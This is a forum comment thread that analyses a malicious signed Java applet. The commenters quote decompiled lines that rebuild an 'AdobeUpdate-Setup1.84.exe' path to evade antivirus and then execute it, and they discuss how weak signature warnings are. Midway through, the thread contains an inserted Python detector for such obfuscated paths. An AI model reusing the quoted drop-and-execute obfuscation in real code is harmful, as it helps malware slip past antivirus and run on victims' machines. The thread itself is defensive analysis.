by Tomdarkness 4818 days ago
Just appears to be an applet that downloads the actual payload. Although, I'm not a security expert and I can't see where the actual exploit is that would allow the file to be downloaded and executed.
3 comments

It's a long time since I went anywhere near Java (let alone an applet) - but these lines don't look very nice:

  String str2 = System.getenv("APPDATA");                 // e.g. C:\Users\<username>\AppData\Roaming
  String str5 = str2 + "\\";                              // append a path separator
  String str6 = "AdobeUpdate-Setup1.84##e";               // file name with ".ex" replaced by "##"
  String str9 = str5.concat(str6.replace("##", ".ex"));   // rebuilds "...\AdobeUpdate-Setup1.84.exe" at runtime
  Runtime.getRuntime().exec(str9);                        // launches the dropped executable
From a quick glance it would appear it tries to execute:

C:\Users\<username>\AppData\Roaming\AdobeUpdate-Setup1.84.exe

Just appears to be a rudimentary attempt at obfuscating the executable path.

The question is, how come the JVM is allowing Runtime.getRuntime().exec() to be called?

According to an up-thread commenter, it's digitally signed, which allows a prompt to the user for elevated permissions.
An evil wee signed applet.
I think that's done to fool AV software. AV software will probably flag up any string which equals "AdobeUpdate-Setup1.exe".
All AV software is about that dumb as far as I know. Anyone who is depending on AV software to protect things like actual money is in serious trouble.
You can't really expect it to do much more in this case, you can make the computation which results in ".exe" arbitrarily complex, and detection needs to be cheap. Ultimately the problem is that AV software is in the business of enumerating badness. You need to do whitelisting, for example of who gets to execute arbitrary code, which is the problem here.
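As an added illustration of the point above (not code from the thread or the applet), here is a small constant-folder that resolves the string-building statements of a decompiled snippet like the one quoted up-thread, so the ".exe" path can be recovered and flagged even though it never appears literally. The Java lines and the APPDATA value are constructed sample input; only the handful of string operations the snippet uses (literals, `+`, `concat`, `replace`, `System.getenv`) are supported.

```python
"""Constant-fold the string-building statements of a decompiled Java applet."""
import ast
import re

# Matches one Java assignment per line, e.g.  String str6 = "Adobe##e";
ASSIGN = re.compile(r'^\s*String\s+(\w+)\s*=\s*(.+?)\s*;\s*$')

# Constructed sample input, modelled on the snippet quoted in the thread.
SAMPLE = [
    'String str2 = System.getenv("APPDATA");',
    'String str5 = str2 + "\\\\";',
    'String str6 = "AdobeUpdate-Setup1.84##e";',
    'String str9 = str5.concat(str6.replace("##", ".ex"));',
    'Runtime.getRuntime().exec(str9);',   # not an assignment, skipped
]


def _java_to_python(expr: str) -> str:
    # Map the Java string calls used here onto Python equivalents so ast can parse them.
    expr = expr.replace(".concat(", ".__add__(")
    return expr.replace("System.getenv(", "getenv(")


def _eval(node, names, env):
    # Tiny interpreter over the Python AST: only string constants, names, + and two method calls.
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.Name):
        return names[node.id]
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        return _eval(node.left, names, env) + _eval(node.right, names, env)
    if isinstance(node, ast.Call):
        args = [_eval(a, names, env) for a in node.args]
        if isinstance(node.func, ast.Name) and node.func.id == "getenv":
            return env.get(args[0], "")          # env is a constructed stand-in for the victim's environment
        if isinstance(node.func, ast.Attribute) and node.func.attr in ("__add__", "replace"):
            return getattr(_eval(node.func.value, names, env), node.func.attr)(*args)
    raise ValueError(f"unsupported expression: {ast.dump(node)}")


def resolve_strings(java_lines, env):
    """Return {variable: fully resolved string} for every String assignment, in order."""
    names = {}
    for line in java_lines:
        m = ASSIGN.match(line)
        if m:
            var, expr = m.groups()
            names[var] = _eval(ast.parse(_java_to_python(expr), mode="eval").body, names, env)
    return names


def obfuscated_executables(java_lines, env):
    """Resolved values ending in .exe whose final form never appears literally in the source."""
    source = "\n".join(java_lines)
    return {v: s for v, s in resolve_strings(java_lines, env).items()
            if s.lower().endswith(".exe") and s not in source}
```

A literal-string scanner would see only "AdobeUpdate-Setup1.84##e"; folding the assignments first is what surfaces the executable path.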

  Runtime.getRuntime().exec(str9);
Why this works is beyond me, but that looks like the actual call to execute it.
A signed applet can do pretty much anything an executable app can do if the user gives it permission. I built a little zip utility applet years ago that accesses the file system, ezyzip.com. Still works even though the signature is expired.
Wow, I hadn't noticed that about Java before; just checked ezyzip.com. The sig is expired, but it only says that right at the bottom of the dialogue, and it still allows you to run it without a problem. I can imagine many people just clicking through that, as it seems almost identical to the standard Java applet warning.

Oracle really need to change that, there should be flashing red lights (alright, maybe not flashing) on that dialogue, otherwise any previously valid signature on a Java applet will be happily trusted by the majority of the internet.

Also, I noticed in the comments on the bitcointalk site that many people are blaming this on Windows. I know the payload is an EXE, but has anyone analysed it and checked if this applies to other OSes as well? If this is (as the author claims) a Java 0-day attack it may well work on other operating systems, and for other purposes. I personally suspect this is a matter of the author accidentally granting permissions to an app that he shouldn't have, but it sounds like this "AdobeUpdate-Setup1.84.exe" could do with some analysis.

Anyone else thinking dolphenstein is an evil genius cracker who just got a load of HNers to run his exploit?
A valid certificate does not make a bad program good.
Yeah, I'd have assumed this would not have been allowed by the JVM, hence the exploit somewhere.

Edit: Apparently the applet was signed, hence no exploit needed.

I reached the same conclusion ... the program downloads a file named "AdobeUpdate-Setup1.84.exe" into Java's temporary directory and then runs it with the line "Runtime.getRuntime().exec(str9);".